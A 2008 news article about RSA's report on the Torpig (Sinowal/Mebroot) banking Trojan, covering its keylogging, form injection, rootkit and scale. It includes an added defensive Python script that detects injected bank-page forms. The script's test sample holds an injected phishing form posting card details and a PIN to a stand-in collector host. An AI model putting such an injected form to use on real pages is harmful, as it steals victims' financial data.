The exact origins of the Trojan have not been determined yet

Nov 1, 2008 10:06 GMT

Researchers from RSA Security have released a worrying report regarding what they call “one of the most pervasive and advanced pieces of crimeware ever created by fraudsters”. Dating back to 2006, the Torpig Trojan, also known as Sinowal or Mebroot, is more active than ever and is spreading at an alarming rate, the experts claim.

The first variants of the Torpig Trojan were detected back in February 2006 and no one has been able to stop it since then. Not only is it still running today, but its activity has drastically increased in 2008, warn researchers from the RSA FraudAction Research Lab. According to them, “almost three years is a very, very long time for just one online gang to maintain the lifecycle and operations in order to effectively utilize just one Trojan”.

This Trojan is not special because of its payload, its propagation, or the techniques it uses. In this regard, it is rather similar to other password-stealing Trojans. The difference is made by the level of organization that characterizes the cybercriminal group behind it, who successfully built an extensive communications network consisting of thousands of domain names and servers, as well as very well structured data collection repositories.

What's even more interesting is that after three years, very few details are known about the gang running this cybercrime network. Older records indicate that at some point, the gang had ties with the infamous Russian Business Network (RBN), but that's not the case anymore. Even so, the fact that the Trojan targeted financial institutions from all around the globe, but not a single one from Russia, could point to its origins.

Torpig has keylogging abilities and attempts to interfere with many antivirus programs installed on the compromised systems. In addition, it is able to drop and install other malware on the infected computers and sends the gathered data to remote servers. The Trojan attempts to trick users into providing sensitive financial information such as bank account or credit card details. To achieve this, it uses a database of URLs belonging to numerous financial institutions and monitors browser activity to detect when a user opens one of these addresses. Then, it forces an HTML form prompt into the browser that is made to look as if it originates from the legitimate URL and asks the user to input their financial information.

In addition, the keylogger component gathers login information for e-mail, FTP and other such accounts. The RSA researchers estimate that the Trojan is responsible for compromising around 300,000 online banking accounts and almost as many credit/debit cards, of which more than 100,000 this year alone. This is the result of a spike in the Trojan's activity in 2008, which might be caused by the introduction of a Master Boot Record (MBR) rootkit component at the beginning of the year.

The researchers estimate that the Trojan authors are currently releasing over 70 new versions per month in 2008, compared to under 25 in 2007. The number of financial institution URLs that trigger the HTML injection on infected systems has also grown from a few hundred to a whopping 2,700. “The purpose of this is to maintain the Trojan’s uninterrupted grip on infected computers,” explain the experts.
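The injection described above adds form fields (and often a foreign submission target) to a page served from the bank's genuine URL, which is exactly what a client-side or proxy-side page integrity check can look for. The following Python script is an added illustration of such a check, not code from RSA or from the Trojan; the bank host, the page path, its expected field names and the two HTML samples are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical baseline: the input names the genuine login page is known to render.
EXPECTED_FIELDS = {"/login": {"username", "password"}}
BANK_HOST = "bank.example"  # placeholder host, not taken from the article


class _FormCollector(HTMLParser):
    """Collect every <form>'s action URL and the names of its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": set()}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("name"):
            self._current["fields"].add(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_page(path, html, host=BANK_HOST):
    """Return findings: fields the genuine page never renders, and forms whose
    action would send the data to a host other than the bank's own."""
    parser = _FormCollector()
    parser.feed(html)
    expected = EXPECTED_FIELDS.get(path, set())
    findings = []
    for form in parser.forms:
        extra = sorted(form["fields"] - expected)
        if extra:
            findings.append(f"unexpected fields {extra}")
        target = urlparse(form["action"])
        if target.netloc and target.netloc != host:
            findings.append(f"form posts to foreign host {target.netloc}")
    return findings


# Constructed samples: the genuine login page, and the same page with an injected prompt.
GENUINE = """<form action="/login" method="post">
<input name="username"><input name="password" type="password"></form>"""
INJECTED = GENUINE + """<form action="http://collector.invalid/drop" method="post">
<p>Please confirm your card details</p>
<input name="card_number"><input name="pin"><input name="mother_maiden"></form>"""

if __name__ == "__main__":
    print(audit_page("/login", GENUINE))   # []
    print(audit_page("/login", INJECTED))  # two findings: extra fields, foreign host
```

The same comparison works server-side against a stored copy of the page, or as a telemetry source when the bank's own JavaScript reports unexpected fields back to a fraud team.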

RSA Security also says that it is currently working closely with affected parties as well as law enforcement agencies in an attempt to stop, or at least slow down, the spread of the Trojan and to inform the owners of the compromised accounts.